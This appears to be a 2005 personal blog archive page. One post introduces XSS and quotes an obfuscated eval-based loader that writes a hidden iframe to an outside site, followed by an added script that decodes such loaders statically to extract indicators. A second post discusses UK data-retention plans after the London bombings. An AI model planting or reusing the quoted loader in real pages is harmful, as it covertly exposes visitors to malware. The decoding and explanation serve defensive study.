Beng Hacks: July 2005

Tuesday, July 26, 2005

XSS: My first encounter

Had my first brush with Cross-Site-Scripting (XSS) a few days ago. Exactly what is XSS? It is getting attacker-supplied script or HTML into a page served by a site you trust, so that it runs in your browser as if that site had written it. The danger is that the injected code can quietly pull in content from some other site, and that site could be hosting trojans!

This is yet one more way an attacker penetrates our PCs. They insert the XSS payload into your favourite (or a popular) site, and it links out to a site that does host trojans, which then try to infect you. If you're not protected, the infection is invisible to you. Even if it fails, you point the finger at your favourite site because the trojan triggered when you visited it. Clever? Ingenious.

Oh, one more thing, check this out:

<script>
// Obfuscated loader as found on the page: every character of s is stored
// one code point too high, shifted back in the loop and then eval'd.
s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00jngsff/butqbdf/dpn0gsff/iunm(?=0jgsbnf?#*<';
o='';
for(i=0;i<116;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}
eval(o);
</script>

Nonsense? Nope. If you decode the simple JavaScript (every character of the string is stored one code point too high, shifted back at runtime and handed to eval), it's actually a hidden IFRAME pulling in another site! Yep, XSS in action.
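Rather than letting eval() run a loader like that to see what it does, you can decode it on paper, or with a few lines of script. The following is an added example, not code from the original post: it reads the shift amount and the string literal out of the loader text, undoes the shift without eval, and pulls the iframe and its src out of the result, flagging iframes styled to be invisible. The function names, the attribute parser and the "hidden" heuristic are my own assumptions; the loader string is the one from the page, held as data so nothing in it executes.

```javascript
// Added example, not code from the original post: decode the character-shift
// obfuscation statically (no eval) and pull the indicators out of the result.
// Function names, the attribute parser and the "hidden" heuristic are my own.

// Constructed sample: the loader shown in the post, held as a string so that
// nothing in it ever executes here.
const OBFUSCATED_LOADER =
  "s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00jngsff/butqbdf/dpn0gsff/iunm(?=0jgsbnf?#*<';" +
  "o='';for(i=0;i<116;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);";

// Find the decode loop "String.fromCharCode(X.charCodeAt(i) -/+ N)" and the
// string literal assigned to X, so the shift is read from the script itself.
function extractShiftLoader(script) {
  const loop = /String\.fromCharCode\((\w+)\.charCodeAt\(\w+\)\s*([+-])\s*(\d+)\)/.exec(script);
  if (!loop) return null;
  const [, varName, sign, amount] = loop;
  const literal = new RegExp("\\b" + varName + "\\s*=\\s*'([^']*)'").exec(script);
  if (!literal) return null;
  // delta is what the loader adds to each code point at runtime (-1 here)
  return { payload: literal[1], delta: (sign === "-" ? -1 : 1) * Number(amount) };
}

// Apply the same per-character delta the loader would, without eval().
function decodeShift(payload, delta) {
  let out = "";
  for (let i = 0; i < payload.length; i++) {
    out += String.fromCharCode(payload.charCodeAt(i) + delta);
  }
  return out;
}

// Parse name=value attributes (quoted or bare) from the body of a tag.
function parseAttributes(attrText) {
  const attrs = {};
  const re = /(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Decode the loader and report every iframe it would write, flagging the
// ones styled to be invisible (display:none, or a box no bigger than 1x1).
function analyzeLoader(script) {
  const found = extractShiftLoader(script);
  if (!found) return { decoded: null, iframes: [] };
  const decoded = decodeShift(found.payload, found.delta);
  const iframes = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(decoded)) !== null) {
    const a = parseAttributes(m[1]);
    const hidden =
      /display\s*:\s*none/i.test(a.style || "") ||
      (Number(a.width) <= 1 && Number(a.height) <= 1);
    iframes.push({ src: a.src || null, hidden });
  }
  return { decoded, iframes };
}

// Stand-alone run: prints the decoded payload and the extracted indicators.
console.log(JSON.stringify(analyzeLoader(OBFUSCATED_LOADER), null, 2));
```

The src that comes out is the indicator you actually want: it is the site to block or report, and the same analysis works on any loader of this one-character-shift family, whatever the shift amount or variable names.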

Sunday, July 10, 2005

All eyes on London, no more civil liberties?

All eyes are currently on London, with them winning the 2012 Olympics bid and then the bomb explosions during the morning rush hour. KNN, the bastards. I wonder, if Paris had won, would bombs have exploded there too? What about the other countries? Are those countries looking for unexploded bombs?

Anyway after the whole incident, now the UK police are investigating and are not leaving any stone unturned. Check this article from The Register out:
Meanwhile, UK authorities have begun contacting ISPs as they look for leads on the bombers. El Reg has received reports that individuals trying to cancel accounts with providers have been told they can't, as security services have already told providers to freeze all accounts.

The Observer reported today that authorities had asked service providers to provide any information deemed relevant. At present there is no requirement to comply, but this may not be the case for long.

The Observer said UK home secretary, Charles Clarke, will this week propose new data retention measures covering mobile phone and internet service providers at an emergency meeting of European Union interior ministers on the implications of the bombings. Clarke will also apply pressure on areas such as law enforcement databases, tracking passports and movements of explosives. Clarke has said he believes authorities might have been able to prevent the bombings if they had access to such data.

Clarke’s efforts could revitalise EU efforts to require providers to retain data for at least years. As of last month the initiative seemed moribund, as member states pushed the program while the EU parliament battled against it.

Shocking... how far will this go? I wonder what the US government has in this area? Maybe they already have supercomputers doing all this?

What about here?